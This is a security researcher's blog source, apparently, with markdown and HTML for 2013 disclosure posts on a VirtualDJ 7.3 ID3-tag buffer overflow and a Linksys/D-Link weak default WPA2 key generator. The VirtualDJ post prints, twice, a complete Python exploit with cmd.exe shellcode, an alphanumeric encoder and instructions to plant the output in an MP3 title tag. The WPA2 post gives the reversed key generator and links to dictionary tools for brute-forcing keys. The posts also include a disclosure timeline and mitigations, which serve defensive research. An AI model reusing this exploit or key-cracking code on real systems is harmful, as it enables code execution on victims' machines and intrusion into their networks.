168 | <li>Make them bigger than 32-bit. Just 2^32 keys are easy to check.</li>
169 | <li>Obtain them from a cryptographically secure PRNG.</li>
170 | <li>If you still want to obtain them from the system time, use fine-grained time units (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.</li>
171 | </ul>
172 |         </article>
173 |         <hr>
174 |         <footer>
175 |             <p>
176 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
177 |             </p>
178 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
179 |         </footer>
180 |     </body>
181 | </html>
182 | 


--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2013-03-30
  4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as _Title_, _Album_, and _Artist_ and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters `[A-Z]` from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer.
  9 | 
 10 | We cannot set `eip` to the address of the first buffer directly since it contains characters which are not in range A-Z. However, if we take into account the previous information, we can do this indirectly: we write `"FSFD"` into bytes 4100:4104 of the title. After the buffer overflow occurs we get `eip == 0x44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing the bytes of the shellcode onto the stack using only printable ASCII characters. Let me explain:
 11 | 
 12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`:
 13 | 
 14 | ```asm
 15 | and   eax, 40404040h   ; 25 40 40 40 40  == "%@@@@"
 16 | and   eax, 3F3F3F3Fh   ; 25 3F 3F 3F 3F  == "%????"  <-- eax == 0
 17 | sub   eax, 40444052h   ; 2D 52 40 44 40  == "-R@D@"
 18 | sub   eax, 40444052h   ; 2D 52 40 44 40  == "-R@D@"
 19 | sub   eax, 40444052h   ; 2D 52 40 44 40  == "-R@D@"
 20 | sub   eax, 3F433F52h   ; 2D 52 3F 43 3F  == "-R?C?"  <-- eax == 0xFFEFFFB8
 21 | push  eax              ; 50              == "P"
 22 | ```
 23 | 
 24 | Once all the bytes of the shellcode are pushed onto the stack (in inverse order) we use `push esp` (0x54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ inserts another 0xC3 byte before this one.
 25 | 
 26 | This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to quickly spread malware just by uploading a malicious MP3 file to a popular site. Even worse, this file might not look suspicious to antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.
 27 | 
 28 | ```python
 29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 
 30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
 32 |  
 33 | import string
 34 |  
 35 | def unicodeHex(c):
 36 |     c = hex(ord(c))[2:].upper()
 37 |     if len(c)==1: c = "0"+c
 38 |     return c+"00"
 39 |  
 40 | def movEAX(s):
 41 |     #Arrays 
 42 |     s = map(ord, list(s))
 43 |     inst = []
 44 |     target = [512, 512, 512, 512]
 45 |     carry  = [0,-2,-2,-2]
 46 |     for i in range(4):
 47 |         if s[i] < 0x10:
 48 |             target[i] = 256
 49 |             if i < 3:
 50 |                 carry[i+1] = -1
 51 |     diff = [target[b] - s[b] for b in range(4)]
 52 |  
 53 |     #Gen instructions 
 54 |     for i in range(3):
 55 |         target = [target[b] - diff[b]/4 for b in range(4)]
 56 |         inst += [[diff[b]/4 for b in range(4)]]
 57 |     target = [target[b] - s[b] + carry[b] for b in range(4)]
 58 |     inst += [target]
 59 |      
 60 |     #Remove characters '[','\',']' 
 61 |     for b in range(4):
 62 |         if ord("[")  in [inst[i][b] for i in range(4)] or \
 63 |            ord("\\") in [inst[i][b] for i in range(4)] or \
 64 |            ord("]")  in [inst[i][b] for i in range(4)]:
 65 |             for i in range(4):
 66 |                 inst[i][b] = inst[i][b] + 5*((-1)**(i))
 67 |      
 68 |     inst  = ["\x2D" + "".join(map(chr, i)) for i in inst]
 69 |     return "".join(inst)
 70 | 
 71 | #Shellcode: Run cmd.exe 
 72 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
 73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
 74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
 75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
 76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
 77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 
 78 | shellcode += retAddress
 79 |  
 80 | while len(shellcode) % 4 != 0:
 81 |     shellcode += '\x90'
 82 | exploit = ""
 83 | for i in range(0,len(shellcode),4)[::-1]:
 84 |     exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0 
 85 |     exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4] 
 86 |     exploit += "\x50"  #PUSH EAX 
 87 | exploit += '\x54\xC3' #PUSH ESP; RETN 
 88 |  
 89 | c = 0
 90 | for i in exploit:
 91 |     if i in string.ascii_letters:
 92 |         c += 1
 93 | exploit +=  "A" * (4100 - c)
 94 | exploit += "FSFD"
 95 |  
 96 | print exploit
 97 | #Paste the generated code in the tag 'Title' of the MP3 file.
 98 | ```
 99 | 
100 | You can see a demo of this proof of concept at: [https://www.youtube.com/watch?v=PJeaWqMJRm0](https://www.youtube.com/watch?v=PJeaWqMJRm0).
101 | 
102 | ## Log
103 | 
104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later.
105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4.
106 | * __2013-03-29__: Exploit published.
107 | 


--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>VirtualDJ Pro/Home 7.3: Buffer Overflow</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>VirtualDJ Pro/Home 7.3: Buffer Overflow</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-30</span>
 72 |             </p>
 73 |             <p>I have found a buffer overflow vulnerability in <a href="http://www.virtualdj.com/">VirtualDJ Pro 7.3 and VirtualDJ Home 7.3</a> and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as <em>Title</em>, <em>Album</em>, and <em>Artist</em> and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters <code>[A-Z]</code> from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the <code>retn</code> instruction, the <code>edi</code> register points to the first buffer.</p>
 74 | <p>We cannot set <code>eip</code> to the address of the first buffer directly, since it contains characters that are not in the range A-Z. However, taking the previous information into account, we can do this indirectly: we write <code>"FSFD"</code> into bytes 4100:4104 of the title. After the buffer overflow occurs we get <code>eip == 0x44465346 == "FSFD"</code>. At this address (inside <em>urlmon.dll</em>) we find a <code>call edi</code> instruction, so the bytes in the first buffer will be executed. Now we face another problem: VirtualDJ has inserted a 0xC3 byte (<code>retn</code>) before each non-printable ASCII character in the first buffer, so we cannot execute the shellcode directly. We can solve this by pushing the bytes of the shellcode onto the stack using only printable ASCII characters. Let me explain:</p>
 75 | <p>Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string <code>"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"</code>:</p>
 76 | <div class="codehilite"><pre><span></span><span class="nf">and</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40404040</span><span class="no">h</span>   <span class="c">; 25 40 40 40 40  == &quot;%@@@@&quot;</span>
 77 | <span class="nf">and</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">3</span><span class="no">F3F3F3Fh</span>   <span class="c">; 25 3F 3F 3F 3F  == &quot;%????&quot;  &lt;– eax == 0</span>
 78 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 79 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 80 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 81 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">3</span><span class="no">F433F52h</span>   <span class="c">; 2D 3F 43 3F 52  == &quot;-R?C?&quot;  &lt;– eax == 0xFFEFFFB8</span>
 82 | <span class="nf">push</span>  <span class="no">eax</span>              <span class="c">; 50              == &quot;P&quot;</span>
 83 | </pre></div>
 84 | 
 85 | 
 86 | <p>Once all the bytes of the shellcode have been pushed onto the stack (in reverse order), we use <code>push esp</code> (0x54) and <code>retn</code> (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ inserts another 0xC3 byte before this one.</p>
 87 | <p>This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music, with millions of downloads around the world. By exploiting this vulnerability it would be possible to quickly spread malware just by uploading a malicious MP3 file to a popular site. Even worse, this file might not look suspicious to antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.</p>
 88 | <div class="codehilite"><pre><span></span><span class="c1">#Exploit: VirtualDJ Pro/Home &lt;=7.3 Buffer Overflow Vulnerability </span>
 89 | <span class="c1">#By: Alexandro Sanchez Bach | functionmixer.blogspot.com </span>
 90 | <span class="c1">#More info: http://www.youtube.com/watch?v=PJeaWqMJRm0</span>
 91 | 
 92 | <span class="kn">import</span> <span class="nn">string</span>
 93 | 
 94 | <span class="k">def</span> <span class="nf">unicodeHex</span><span class="p">(</span><span class="n">c</span><span class="p">):</span>
 95 |     <span class="n">c</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">))[</span><span class="mi">2</span><span class="p">:]</span><span class="o">.</span><span class="n">upper</span><span class="p">()</span>
 96 |     <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">c</span><span class="p">)</span><span class="o">==</span><span class="mi">1</span><span class="p">:</span> <span class="n">c</span> <span class="o">=</span> <span class="s2">&quot;0&quot;</span><span class="o">+</span><span class="n">c</span>
 97 |     <span class="k">return</span> <span class="n">c</span><span class="o">+</span><span class="s2">&quot;00&quot;</span>
 98 | 
 99 | <span class="k">def</span> <span class="nf">movEAX</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
100 |     <span class="c1">#Arrays </span>
101 |     <span class="n">s</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="nb">list</span><span class="p">(</span><span class="n">s</span><span class="p">))</span>
102 |     <span class="n">inst</span> <span class="o">=</span> <span class="p">[]</span>
103 |     <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">]</span>
104 |     <span class="n">carry</span>  <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
105 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
106 |         <span class="k">if</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mh">0x10</span><span class="p">:</span>
107 |             <span class="n">target</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">256</span>
108 |             <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
109 |                 <span class="n">carry</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span>
110 |     <span class="n">diff</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
111 | 
112 |     <span class="c1">#Gen instructions </span>
113 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span>
114 |         <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">diff</span><span class="p">[</span><span class="n">b</span><span class="p">]</span><span class="o">/</span><span class="mi">4</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
115 |         <span class="n">inst</span> <span class="o">+=</span> <span class="p">[[</span><span class="n">diff</span><span class="p">[</span><span class="n">b</span><span class="p">]</span><span class="o">/</span><span class="mi">4</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]]</span>
116 |     <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">+</span> <span class="n">carry</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
117 |     <span class="n">inst</span> <span class="o">+=</span> <span class="p">[</span><span class="n">target</span><span class="p">]</span>
118 | 
119 |     <span class="c1">#Remove characters &#39;[&#39;,&#39;\&#39;,&#39;]&#39; </span>
120 |     <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
121 |         <span class="k">if</span> <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;[&quot;</span><span class="p">)</span>  <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span> <span class="ow">or</span> \
122 |            <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\\</span><span class="s2">&quot;</span><span class="p">)</span> <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span> <span class="ow">or</span> \
123 |            <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;]&quot;</span><span class="p">)</span>  <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]:</span>
124 |             <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
125 |                 <span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="o">=</span> <span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="o">+</span> <span class="mi">5</span><span class="o">*</span><span class="p">((</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">**</span><span class="p">(</span><span class="n">i</span><span class="p">))</span>
126 | 
127 |     <span class="n">inst</span>  <span class="o">=</span> <span class="p">[</span><span class="s2">&quot;</span><span class="se">\x2D</span><span class="s2">&quot;</span> <span class="o">+</span> <span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="n">i</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">inst</span><span class="p">]</span>
128 |     <span class="k">return</span> <span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
129 | 
130 | <span class="c1">#Shellcode: Run cmd.exe </span>
131 | <span class="n">shellcode</span>  <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC</span><span class="s2">&quot;</span>
132 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45</span><span class="s2">&quot;</span>
133 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45</span><span class="s2">&quot;</span>
134 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45</span><span class="s2">&quot;</span>
135 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3</span><span class="s2">&quot;</span>
136 | <span class="n">retAddress</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xED\x1E\x94\x7C</span><span class="s2">&quot;</span> <span class="c1"># JMP ESP ntdll.dll WinXP SP2 </span>
137 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">retAddress</span>
138 | 
139 | <span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
140 |     <span class="n">shellcode</span> <span class="o">+=</span> <span class="s1">&#39;</span><span class="se">\x90</span><span class="s1">&#39;</span>
141 | <span class="n">exploit</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
142 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span><span class="mi">4</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
143 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F</span><span class="s2">&quot;</span>  <span class="c1">#EAX = 0 </span>
144 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="n">movEAX</span><span class="p">(</span><span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">4</span><span class="p">])</span>  <span class="c1">#EAX = shellcode[i:i+4] </span>
145 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x50</span><span class="s2">&quot;</span>  <span class="c1">#PUSH EAX </span>
146 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s1">&#39;</span><span class="se">\x54\xC3</span><span class="s1">&#39;</span> <span class="c1">#PUSH ESP; RETN </span>
147 | 
148 | <span class="n">c</span> <span class="o">=</span> <span class="mi">0</span>
149 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">exploit</span><span class="p">:</span>
150 |     <span class="k">if</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span><span class="p">:</span>
151 |         <span class="n">c</span> <span class="o">+=</span> <span class="mi">1</span>
152 | <span class="n">exploit</span> <span class="o">+=</span>  <span class="s2">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="mi">4100</span> <span class="o">-</span> <span class="n">c</span><span class="p">)</span>
153 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;FSFD&quot;</span>
154 | 
155 | <span class="k">print</span> <span class="n">exploit</span>
156 | <span class="c1">#Paste the generated code in the tag &#39;Title&#39; of the MP3 file.</span>
157 | </pre></div>
158 | 
159 | 
160 | <p>You can see a demo of this proof of concept at: <a href="https://www.youtube.com/watch?v=PJeaWqMJRm0">https://www.youtube.com/watch?v=PJeaWqMJRm0</a>.</p>
161 | <h2 id="log">Log</h2>
162 | <ul>
163 | <li><strong>2012-11-29</strong>: Bug discovered. VirtualDJ was emailed about this a few days later.</li>
164 | <li><strong>2013-03-20</strong>: Bug fixed with the release of VirtualDJ Pro/Home 7.4.</li>
165 | <li><strong>2013-03-29</strong>: Exploit published.</li>
166 | </ul>
167 |         </article>
168 |         <hr>
169 |         <footer>
170 |             <p>
171 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
172 |             </p>
173 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
174 |         </footer>
175 |     </body>
176 | </html>
177 | 


--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2013-03-31
 4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers use nearly the same algorithm as TP-Link routers to generate the default WPA2 keys. For more information about this vulnerability and its consequences, please refer to the report linked above, as redundant information will be omitted here.
 9 | 
10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based on *Network Magic*, software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, other assistants might be affected as well.
11 | 
12 | The reversed generator is:
13 | 
14 | ```python
15 | blacklist_windows = "1I2Z0O5SUV"
16 | blacklist_macosx  = "B8DO0I1S5UVZ2"
17 | blacklist = blacklist_windows  # Change me
18 | 
19 | def gen(seed):
20 |     key = ""
21 |     for i in range(10):
22 |         while True:
23 |             seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
24 |             edx = ((seed >> 0x10) & 0x7FFF) % 0x24
25 |             if edx >= 0xA:
26 |                 edx += 0x37
27 |             else:
28 |                 edx += 0x30
29 |             if chr(edx) not in blacklist:
30 |                 key += chr(edx)
31 |                 break
32 |     return key
33 | ```
34 | 
35 | The seeds used by this function are obtained in exactly the same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a *whitelist*, it adds random characters in the range `[0-9A-Z]`, filtering out those found in a hardcoded *blacklist*, meant to prevent adding visually similar characters such as '`0`' and '`O`' to the key.
36 | 
37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.
38 | 
39 | 
40 | ## Affected routers
41 | 
42 | The complete list of affected Linksys routers is:
43 | 
44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`)
45 | * WRT110
46 | * WRT120N
47 | * WRT160N (V1, V2, V3)
48 | * WRT160N-HP (V1*)
49 | * WRT160NL
50 | * WRT310N (V1, V2)
51 | * WRT320N
52 | * WRT400N
53 | * WRT54G2
54 | * WRT610N (V1*, V2)
55 | 	
56 | The complete list of affected D-Link routers is:
57 | 
58 | * DGL-4100
59 | * DGL-4300
60 | * DIR-615 (not all revisions)
61 | * DIR-625
62 | * DIR-635
63 | * WBR-1310
64 | * WBR-1310 Rev. B
65 | * WBR-2310
66 | 
67 | 
68 | ## Resources
69 | 
70 | * __Linksys-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto).
71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j).
72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: [http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt).
73 | 
74 | 
75 | ## Solutions
76 | 
77 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/urandom` in Unix-like systems as indices of the character array modulo its length. This is, for instance, what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
78 | * If for some reason you want to use seeds for generating keys:
79 |   * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
80 |   * Obtain them from a cryptographically secure PRNG.
81 |   * If you still want to obtain them from the system time, use high-resolution time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
82 | 


--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>WPA2 Key Generation Vulnerability: Linksys / D-Link</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
